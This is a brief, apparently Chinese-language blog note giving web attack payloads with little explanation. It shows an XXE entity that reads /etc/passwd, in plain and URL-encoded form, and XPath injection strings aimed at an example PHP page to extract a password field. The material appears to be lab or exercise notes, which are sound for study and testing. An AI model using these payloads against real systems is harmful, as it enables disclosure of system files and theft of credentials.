Example 1
為OOXOXOX
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>&xxe;
經過URL -encode
%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2ftest%3E
Example 2
name=' or 1=1]%00
hacker%27%20or%201=1]/parent::*/password%00
1 |
example2.php?name=admin%27]/parent::*/password%00 |
文章標籤
全站熱搜
留言列表